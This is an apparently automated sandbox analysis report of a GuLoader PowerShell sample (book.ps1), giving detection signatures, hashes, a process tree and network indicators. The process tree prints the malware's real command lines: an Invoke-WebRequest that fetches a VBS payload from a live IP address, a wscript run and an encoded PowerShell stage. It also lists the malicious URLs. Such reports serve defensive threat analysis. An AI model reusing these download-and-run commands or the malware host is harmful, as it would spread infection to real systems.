Windows Analysis Report
book.ps1

Overview

General Information

Sample Name: book.ps1
Analysis ID: 623683
MD5: 10c1a6b6135d5f641ed56cfde0da1967
SHA1: dbf7d6327c2bf13f3ae772f6eaaa1c0a5fc5473e
SHA256: 75de1e1b097579bf1a18c494042b16192a969dfb0fb9cdb3759d362b7b4b6a5f
Tags: Guloaderps1

Detection

GuLoader
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Encrypted powershell cmdline option found
Very long command line found
Potential dropper URLs found in powershell memory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • powershell.exe (PID: 3144 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\book.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
    • wscript.exe (PID: 6948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • powershell.exe (PID: 6276 cmdline: C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "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 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • csc.exe (PID: 5752 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
          • cvtres.exe (PID: 1280 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
No configs have been found
Source: 0000000E.00000002.544284081.0000000009290000.00000040.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    AV Detection

    Source: http://46.4.198.55 | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbsh | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~ | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$ | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs0yj | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.v | Avira URL Cloud: Label: malware
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

    Networking

    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q1
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX
    Source: global traffic | HTTP traffic detected: GET /10P/Sursdepa.vbs HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: 46.4.198.55 | Connection: Keep-Alive
    Source: unknown | TCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55
    Source: powershell.exe, 00000003.00000002.292149897.00000167E848D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.v
    Source: powershell.exe, 00000003.00000002.295924482.00000167E855C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282654233.00000167E5B98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs
    Source: powershell.exe, 00000003.00000002.282555129.00000167E5B10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs
    Source: powershell.exe, 00000003.00000002.301030775.00000167FFDE7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281332697.00000167FFDE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$
    Source: powershell.exe, 00000003.00000002.282784282.00000167E5E50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~
    Source: powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs0yj
    Source: powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbsh
    Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55x
    Source: powershell.exe, 00000001.00000002.335374156.00000211CEF07000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.300317707.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281232280.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.528421591.0000000002D8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000001.00000002.323271463.00000211B7732000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
    Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.0000021